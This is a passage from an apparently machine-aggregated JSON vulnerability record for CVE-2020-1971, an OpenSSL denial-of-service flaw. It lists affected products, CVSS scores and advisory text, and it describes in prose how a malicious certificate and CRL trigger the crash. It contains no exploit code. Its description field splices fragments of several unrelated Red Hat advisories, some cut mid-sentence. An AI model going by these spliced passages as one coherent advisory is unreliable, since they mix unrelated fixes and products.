        "trust": 1.0,
        "vendor": "oracle",
        "version": "1.10.0"
      },
      {
        "_id": null,
        "model": "communications diameter intelligence hub",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.0"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "10.23.1"
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "_id": null,
        "model": "enterprise manager base platform",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.4.0.0"
      },
      {
        "_id": null,
        "model": "santricity smi-s provider",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.2"
      },
      {
        "_id": null,
        "model": "business intelligence",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.2.1.4.0"
      },
      {
        "_id": null,
        "model": "graalvm",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "20.3.0"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "10.12.0"
      },
      {
        "_id": null,
        "model": "enterprise session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.3"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "12.13.0"
      },
      {
        "_id": null,
        "model": "api gateway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "11.1.2.4.0"
      },
      {
        "_id": null,
        "model": "enterprise manager base platform",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.3.0.0"
      },
      {
        "_id": null,
        "model": "enterprise communications broker",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "pcz3.1"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "15.0.0"
      },
      {
        "_id": null,
        "model": "enterprise communications broker",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "pcz3.3"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "14.15.0"
      },
      {
        "_id": null,
        "model": "communications unified session manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "scz8.2.5"
      },
      {
        "_id": null,
        "model": "communications diameter intelligence hub",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.1.0"
      },
      {
        "_id": null,
        "model": "ef600a",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-1971"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "160654"
      },
      {
        "db": "PACKETSTORM",
        "id": "160605"
      },
      {
        "db": "PACKETSTORM",
        "id": "161546"
      },
      {
        "db": "PACKETSTORM",
        "id": "161727"
      },
      {
        "db": "PACKETSTORM",
        "id": "160882"
      },
      {
        "db": "PACKETSTORM",
        "id": "161548"
      },
      {
        "db": "PACKETSTORM",
        "id": "162130"
      },
      {
        "db": "PACKETSTORM",
        "id": "161389"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-579"
      }
    ],
    "trust": 1.4
  },
  "cve": "CVE-2020-1971",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2020-1971",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.0,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-173115",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.2,
            "id": "CVE-2020-1971",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-1971",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-579",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-173115",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-173115"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-579"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-1971"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL\u0027s s_server, s_client and verify tools have support for the \"-crl_download\" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL\u0027s parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w). The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. \n\nSecurity Fix(es):\n\n* cluster-ingress-operator: changes to loadBalancerSourceRanges overwritten\nby operator (CVE-2020-27836)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. This could\nprevent installations to flavors detected as `baremetal`, which might have\nthe required capacity to complete the installation. This is usually caused\nby OpenStack administrators not setting the appropriate metadata on their\nbare metal flavors. Validations are now skipped on flavors detected as\n`baremetal`, to prevent incorrect failures from being reported. \n(BZ#1889416)\n\n* Previously, there was a broken link on the OperatorHub install page of\nthe web console, which was intended to reference the cluster monitoring\ndocumentation. Bugs fixed (https://bugzilla.redhat.com/):\n\n1885442 - Console doesn\u0027t load in iOS Safari when using self-signed certificates\n1885946 - console-master-e2e-gcp-console test periodically fail due to no Alerts found\n1887551 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console\n1888165 - [release 4.6] IO doesn\u0027t recognize namespaces - 2 resources with the same name in 2 namespaces -\u003e only 1 gets collected\n1888650 - Fix CVE-2015-7501 affecting agent-maven-3.5\n1888717 - Cypress:  Fix \u0027link-name\u0027 accesibility violation\n1888721 - ovn-masters stuck in crashloop after scale test\n1890993 - Selected Capacity is showing wrong size\n1890994 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off\n1891427 - CLI does not save login credentials as expected when using the same username in multiple clusters\n1891454 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName\n1891499 - Other machine config pools do not show during update\n1891891 - Wrong detail head on network policy detail page. Relevant releases/architectures:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 7.7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 7.7) - ppc64, ppc64le, s390x, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. Package List:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.7):\n\nSource:\nopenssl-1.0.2k-20.el7_7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-20.el7_7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-20.el7_7.i686.rpm\nopenssl-debuginfo-1.0.2k-20.el7_7.x86_64.rpm\nopenssl-libs-1.0.2k-20.el7_7.i686.rpm\nopenssl-libs-1.0.2k-20.el7_7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-20.el7_7.i686.rpm\nopenssl-debuginfo-1.0.2k-20.el7_7.x86_64.rpm\nopenssl-devel-1.0.2k-20.el7_7.i686.rpm\nopenssl-devel-1.0.2k-20.el7_7.x86_64.rpm\nopenssl-perl-1.0.2k-20.el7_7.x86_64.rpm\nopenssl-static-1.0.2k-20.el7_7.i686.rpm\nopenssl-static-1.0.2k-20.el7_7.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 7.7):\n\nSource:\nopenssl-1.0.2k-20.el7_7.src.rpm\n\nppc64:\nopenssl-1.0.2k-20.el7_7.ppc64.rpm\nopenssl-debuginfo-1.0.2k-20.el7_7.ppc.rpm\nopenssl-debuginfo-1.0.2k-20.el7_7.ppc64.rpm\nopenssl-devel-1.0.2k-20.el7_7.ppc.rpm\nopenssl-devel-1.0.2k-20.el7_7.ppc64.rpm\nopenssl-libs-1.0.2k-20.el7_7.ppc.rpm\nopenssl-libs-1.0.2k-20.el7_7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.2k-20.el7_7.ppc64le.rpm\nopenssl-debuginfo-1.0.2k-20.el7_7.ppc64le.rpm\nopenssl-devel-1.0.2k-20.el7_7.ppc64le.rpm\nopenssl-libs-1.0.2k-20.el7_7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.2k-20.el7_7.s390x.rpm\nopenssl-debuginfo-1.0.2k-20.el7_7.s390.rpm\nopenssl-debuginfo-1.0.2k-20.el7_7.s390x.rpm\nopenssl-devel-1.0.2k-20.el7_7.s390.rpm\nopenssl-devel-1.0.2k-20.el7_7.s390x.rpm\nopenssl-libs-1.0.2k-20.el7_7.s390.rpm\nopenssl-libs-1.0.2k-20.el7_7.s390x.rpm\n\nx86_64:\nopenssl-1.0.2k-20.el7_7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-20.el7_7.i686.rpm\nopenssl-debuginfo-1.0.2k-20.el7_7.x86_64.rpm\nopenssl-devel-1.0.2k-20.el7_7.i686.rpm\nopenssl-devel-1.0.2k-20.el7_7.x86_64.rpm\nopenssl-libs-1.0.2k-20.el7_7.i686.rpm\nopenssl-libs-1.0.2k-20.el7_7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: OpenShift Container Platform 4.7.0 security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2020:5633-01\nProduct:           Red Hat OpenShift Enterprise\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2020:5633\nIssue date:        2021-02-24\nCVE Names:         CVE-2018-10103 CVE-2018-10105 CVE-2018-14461 \n                   CVE-2018-14462 CVE-2018-14463 CVE-2018-14464 \n                   CVE-2018-14465 CVE-2018-14466 CVE-2018-14467 \n                   CVE-2018-14468 CVE-2018-14469 CVE-2018-14470 \n                   CVE-2018-14553 CVE-2018-14879 CVE-2018-14880 \n                   CVE-2018-14881 CVE-2018-14882 CVE-2018-16227 \n                   CVE-2018-16228 CVE-2018-16229 CVE-2018-16230 \n                   CVE-2018-16300 CVE-2018-16451 CVE-2018-16452 \n                   CVE-2018-20843 CVE-2019-3884 CVE-2019-5018 \n                   CVE-2019-6977 CVE-2019-6978 CVE-2019-8625 \n                   CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 \n                   CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 \n                   CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 \n                   CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 \n                   CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 \n                   CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 \n                   CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 \n                   CVE-2019-8846 CVE-2019-9455 CVE-2019-9458 \n                   CVE-2019-11068 CVE-2019-12614 CVE-2019-13050 \n                   CVE-2019-13225 CVE-2019-13627 CVE-2019-14889 \n                   CVE-2019-15165 CVE-2019-15166 CVE-2019-15903 \n                   CVE-2019-15917 CVE-2019-15925 CVE-2019-16167 \n                   CVE-2019-16168 CVE-2019-16231 CVE-2019-16233 \n                   CVE-2019-16935 CVE-2019-17450 CVE-2019-17546 \n                   CVE-2019-18197 CVE-2019-18808 CVE-2019-18809 \n                   CVE-2019-19046 CVE-2019-19056 CVE-2019-19062 \n                   CVE-2019-19063 CVE-2019-19068 CVE-2019-19072 \n                   CVE-2019-19221 CVE-2019-19319 CVE-2019-19332 \n                   CVE-2019-19447 CVE-2019-19524 CVE-2019-19533 \n                   CVE-2019-19537 CVE-2019-19543 CVE-2019-19602 \n                   CVE-2019-19767 CVE-2019-19770 CVE-2019-19906 \n                   CVE-2019-19956 CVE-2019-20054 CVE-2019-20218 \n                   CVE-2019-20386 CVE-2019-20387 CVE-2019-20388 \n                   CVE-2019-20454 CVE-2019-20636 CVE-2019-20807 \n                   CVE-2019-20812 CVE-2019-20907 CVE-2019-20916 \n                   CVE-2020-0305 CVE-2020-0444 CVE-2020-1716 \n                   CVE-2020-1730 CVE-2020-1751 CVE-2020-1752 \n                   CVE-2020-1971 CVE-2020-2574 CVE-2020-2752 \n                   CVE-2020-2922 CVE-2020-3862 CVE-2020-3864 \n                   CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 \n                   CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 \n                   CVE-2020-3897 CVE-2020-3898 CVE-2020-3899 \n                   CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 \n                   CVE-2020-6405 CVE-2020-7595 CVE-2020-7774 \n                   CVE-2020-8177 CVE-2020-8492 CVE-2020-8563 \n                   CVE-2020-8566 CVE-2020-8619 CVE-2020-8622 \n                   CVE-2020-8623 CVE-2020-8624 CVE-2020-8647 \n                   CVE-2020-8648 CVE-2020-8649 CVE-2020-9327 \n                   CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 \n                   CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 \n                   CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 \n                   CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 \n                   CVE-2020-9925 CVE-2020-10018 CVE-2020-10029 \n                   CVE-2020-10732 CVE-2020-10749 CVE-2020-10751 \n                   CVE-2020-10763 CVE-2020-10773 CVE-2020-10774 \n                   CVE-2020-10942 CVE-2020-11565 CVE-2020-11668 \n                   CVE-2020-11793 CVE-2020-12465 CVE-2020-12655 \n                   CVE-2020-12659 CVE-2020-12770 CVE-2020-12826 \n                   CVE-2020-13249 CVE-2020-13630 CVE-2020-13631 \n                   CVE-2020-13632 CVE-2020-14019 CVE-2020-14040 \n                   CVE-2020-14381 CVE-2020-14382 CVE-2020-14391 \n                   CVE-2020-14422 CVE-2020-15157 CVE-2020-15503 \n                   CVE-2020-15862 CVE-2020-15999 CVE-2020-16166 \n                   CVE-2020-24490 CVE-2020-24659 CVE-2020-25211 \n                   CVE-2020-25641 CVE-2020-25658 CVE-2020-25661 \n                   CVE-2020-25662 CVE-2020-25681 CVE-2020-25682 \n                   CVE-2020-25683 CVE-2020-25684 CVE-2020-25685 \n                   CVE-2020-25686 CVE-2020-25687 CVE-2020-25694 \n                   CVE-2020-25696 CVE-2020-26160 CVE-2020-27813 \n                   CVE-2020-27846 CVE-2020-28362 CVE-2020-29652 \n                   CVE-2021-2007 CVE-2021-3121 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.7.0 is now available. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.0. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2020:5634\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.0-x86_64\n\nThe image digest is\nsha256:d74b1cfa81f8c9cc23336aee72d8ae9c9905e62c4874b071317a078c316f8a70\n\n(For s390x architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.0-s390x\n\nThe image digest is\nsha256:a68ca03d87496ddfea0ac26b82af77231583a58a7836b95de85efe5e390ad45d\n\n(For ppc64le architecture)\n\n  $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.0-ppc64le\n\nThe image digest is\nsha256:bc7b04e038c8ff3a33b827f4ee19aa79b26e14c359a7dcc1ced9f3b58e5f1ac6\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -between-minor.html#understanding-upgrade-channels_updating-cluster-between\n- -minor. \n\nSecurity Fix(es):\n\n* crewjam/saml: authentication bypass in saml authentication\n(CVE-2020-27846)\n\n* golang: crypto/ssh: crafted authentication request can lead to nil\npointer dereference (CVE-2020-29652)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\n* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)\n\n* kubernetes: Secret leaks in kube-controller-manager when using vSphere\nProvider (CVE-2020-8563)\n\n* containernetworking/plugins: IPv6 router advertisements allow for MitM\nattacks on IPv4 clusters (CVE-2020-10749)\n\n* heketi: gluster-block volume password details available in logs\n(CVE-2020-10763)\n\n* golang.org/x/text: possibility to trigger an infinite loop in\nencoding/unicode could lead to crash (CVE-2020-14040)\n\n* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)\n\n* golang-github-gorilla-websocket: integer overflow leads to denial of\nservice (CVE-2020-27813)\n\n* golang: math/big: panic during recursive division of very large numbers\n(CVE-2020-28362)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nFor OpenShift Container Platform 4.7, see the following documentation,\nwhich\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster\n- -cli.html. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1620608 - Restoring deployment config with history leads to weird state\n1752220 - [OVN] Network Policy fails to work when project label gets overwritten\n1756096 - Local storage operator should implement must-gather spec\n1756173 - /etc/udev/rules.d/66-azure-storage.rules missing from initramfs\n1768255 - installer reports 100% complete but failing components\n1770017 - Init containers restart when the exited container is removed from node. \n1775057 - [MSTR-485] Cluster is abnormal after etcd backup/restore when the backup is conducted during etcd encryption is migrating\n1775444 - RFE: k8s cpu manager does not restrict /usr/bin/pod cpuset\n1777038 - Cluster scaled beyond host subnet limits does not fire alert or cleanly report why it cannot scale\n1777224 - InfraID in metadata.json and .openshift_install_state.json is not consistent when repeating `create` commands\n1784298 - \"Displaying with reduced resolution due to large dataset.\" would show under some conditions\n1785399 - Under condition of heavy pod creation, creation fails with \u0027error reserving pod name ...: name is reserved\"\n1797766 - Resource Requirements\" specDescriptor fields - CPU and Memory injects empty string YAML editor\n1801089 - [OVN] Installation failed and monitoring pod not created due to some network error. \n1805025 - [OSP] Machine status doesn\u0027t become \"Failed\" when creating a machine with invalid image\n1805639 - Machine status should be \"Failed\" when creating a machine with invalid machine configuration\n1806000 - CRI-O failing with: error reserving ctr name\n1806915 - openshift-service-ca: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be\n1806917 - openshift-service-ca-operator: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be\n1810438 - Installation logs are not gathered from OCP nodes\n1812085 - kubernetes-networking-namespace-pods dashboard doesn\u0027t exist\n1812412 - Monitoring Dashboard: on restricted cluster, query timed out in expression evaluation\n1813012 - EtcdDiscoveryDomain no longer needed\n1813949 - openshift-install doesn\u0027t use env variables for OS_* for some of API endpoints\n1816812 - OpenShift test suites are not resilient to rate limited registries (like docker.io) and cannot control their dependencies for offline use\n1819053 - loading OpenAPI spec for \"v1beta1.metrics.k8s.io\" failed with: OpenAPI spec does not exist\n1819457 - Package Server is in \u0027Cannot update\u0027 status despite properly working\n1820141 - [RFE] deploy qemu-quest-agent on the nodes\n1822744 - OCS Installation CI test flaking\n1824038 - Integration Tests: StaleElementReferenceError in OLM single-installmode scenario\n1825892 - StorageClasses and PVs are not cleaned completely after running the csi verification tool\n1826301 - Wrong NodeStatus reports in file-integrity scan when configuration error in aide.conf file\n1829723 - User workload monitoring alerts fire out of the box\n1832968 - oc adm catalog mirror does not mirror the index image itself\n1833012 - Lower OVNKubernetes HTTP E/W performance compared with OpenShiftSDN\n1833220 - CVE-2020-10749 containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters\n1834995 - olmFull suite always fails once th suite is run on the same cluster\n1836017 - vSphere UPI: Both Internal and External load balancers for kube-apiserver should use /readyz\n1837953 - Replacing masters doesn\u0027t work for ovn-kubernetes 4.4\n1838352 - OperatorExited, Pending marketplace-operator-... pod for several weeks\n1838751 - [oVirt][Tracker] Re-enable skipped network tests\n1839239 - csi-snapshot-controller flickers Degraded=True on etcd hiccups\n1840759 - [aws-ebs-csi-driver] The volume created by aws ebs csi driver can not be deleted when the cluster is destroyed\n1841039 - authentication-operator: Add e2e test for password grants to Keycloak being set as OIDC IdP\n1841119 - Get rid of config patches and pass flags directly to kcm\n1841175 - When an Install Plan gets deleted, OLM does not create a new one\n1841381 - Issue with memoryMB validation\n1841885 - oc adm catalog mirror command attempts to pull from registry.redhat.io when using --from-dir option\n1844727 - Etcd container leaves grep and lsof zombie processes\n1845387 - CVE-2020-10763 heketi: gluster-block volume password details available in logs\n1847074 - Filter bar layout issues at some screen widths on search page\n1848358 - CRDs with preserveUnknownFields:true don\u0027t reflect in status that they are non-structural\n1849543 - [4.5]kubeletconfig\u0027s description will show multiple lines for finalizers when upgrade from 4.4.8-\u003e4.5\n1851103 - Use of NetworkManager-wait-online.service in rhcos-growpart.service\n1851203 - [GSS] [RFE] Need a simpler representation of capactiy breakdown in total usage and per project breakdown in OCS 4 dashboard\n1851351 - OCP 4.4.9: EtcdMemberIPMigratorDegraded: rpc error: code = Canceled desc = grpc: the client connection is closing\n1851693 - The `oc apply` should return errors instead of hanging there when failing to create the CRD\n1852289 - Upgrade testsuite fails on ppc64le environment - Unsupported LoadBalancer service\n1853115 - the restriction of --cloud option should be shown in help text. \n1853116 - `--to` option does not work with `--credentials-requests` flag. \n1853352 - [v2v][UI] Storage Class fields Should  Not be empty  in VM  disks view\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n1854567 - \"Installed Operators\" list showing \"duplicated\" entries during installation\n1855325 - [Feature:Prometheus][Conformance] Prometheus when installed on the cluster [Top Level] [Feature:Prometheus][Conformance] Prometheus when installed on the cluster should report telemetry if a cloud.openshift.com token is present\n1855351 - Inconsistent Installer reactions to Ctrl-C during user input process\n1855408 - OVN cluster unstable after running minimal scale test\n1856351 - Build page should show metrics for when the build ran, not the last 30 minutes\n1856354 - New APIServices missing from OpenAPI definitions\n1857446 - ARO/Azure: excessive pod memory allocation causes node lockup\n1857877 - Operator upgrades can delete existing CSV before completion\n1858578 - [v2v] [ui] VM import RHV to CNV Target VM Name longer than 63 chars should not be allowed\n1859174 - [IPI][OSP] Having errors from 4.3 to 4.6 about Security group rule already created\n1860136 - default ingress does not propagate annotations to route object on update\n1860322 - [OCPv4.5.2] after unexpected shutdown one of RHV Hypervisors, OCP worker nodes machine are marked as \"Failed\"\n1860518 - unable to stop a crio pod\n1861383 - Route with `haproxy.router.openshift.io/timeout: 365d` kills the ingress controller\n1862430 - LSO: PV creation lock should not be acquired in a loop\n1862489 - LSO autoprovisioning should exclude top level disks that are part of LVM volume group. \n1862608 - Virtual media does not work on hosts using BIOS, only UEFI\n1862918 - [v2v] User should only select SRIOV network when importin vm with SRIOV network\n1865743 - Some pods are stuck in ContainerCreating and some sdn pods are in CrashLoopBackOff\n1865839 - rpm-ostree fails with \"System transaction in progress\" when moving to kernel-rt\n1866043 - Configurable table column headers can be illegible\n1866087 - Examining agones helm chart resources results in \"Oh no!\"\n1866261 - Need to indicate the intentional behavior for Ansible in the `create api` help info\n1866298 - [RHOCS Usability Study][Installation] Labeling the namespace should be a part of the installation flow or be clearer as a requirement\n1866320 - [RHOCS Usability Study][Dashboard] Users were confused by Available Capacity and the Total Capacity\n1866334 - [RHOCS Usability Study][Installation] On the Operator installation page, there\u2019s no indication on which labels offer tooltip/help\n1866340 - [RHOCS Usability Study][Dashboard] It was not clear why \u201cNo persistent storage alerts\u201d was prominently displayed\n1866343 - [RHOCS Usability Study][Dashboard] User wanted to know the time frame for Data Consumption, e.g I/O Operations\n1866445 - kola --basic-qemu-scenarios scenario fail on ppc64le \u0026 s390x\n1866482 - Few errors are seen when oc adm must-gather is run\n1866605 - No metadata.generation set for build and buildconfig objects\n1866873 - MCDDrainError \"Drain failed on  , updates may be blocked\" missing rendered node name\n1866901 - Deployment strategy for BMO allows multiple pods to run at the same time\n1866925 - openshift-install destroy cluster should fail quickly when provided with invalid credentials on Azure. \n1867165 - Cannot assign static address to baremetal install bootstrap vm\n1867380 - When using webhooks in OCP 4.5 fails to rollout latest deploymentconfig\n1867400 - [OCs 4.5]UI should not allow creation of second storagecluster of different mode in a single OCS\n1867477 - HPA monitoring cpu utilization fails for deployments which have init containers\n1867518 - [oc] oc should not print so many goroutines when ANY command fails\n1867608 - ds/machine-config-daemon takes 100+ minutes to rollout on  250 node cluster\n1867965 - OpenShift Console Deployment Edit overwrites deployment yaml\n1868004 - opm index add appears to produce image with wrong registry server binary\n1868065 - oc -o jsonpath prints possible warning / bug \"Unable to decode server response into a Table\"\n1868104 - Baremetal actuator should not delete Machine objects\n1868125 - opm index add is not creating an index with valid images when --permissive flag is added, the index is empty instead\n1868384 - CLI does not save login credentials as expected when using the same username in multiple clusters\n1868527 - OpenShift Storage using VMWare vSAN receives error \"Failed to add disk \u0027scsi0:2\u0027\" when mounted pod is created on separate node\n1868645 - After a disaster recovery pods a stuck in \"NodeAffinity\" state and not running\n1868748 - ClusterProvisioningIP in baremetal platform has wrong JSON annotation\n1868765 - [vsphere][ci] could not reserve an IP address: no available addresses\n1868770 - catalogSource named \"redhat-operators\" deleted in a disconnected cluster\n1868976 - Prometheus error opening query log file on EBS backed PVC\n1869293 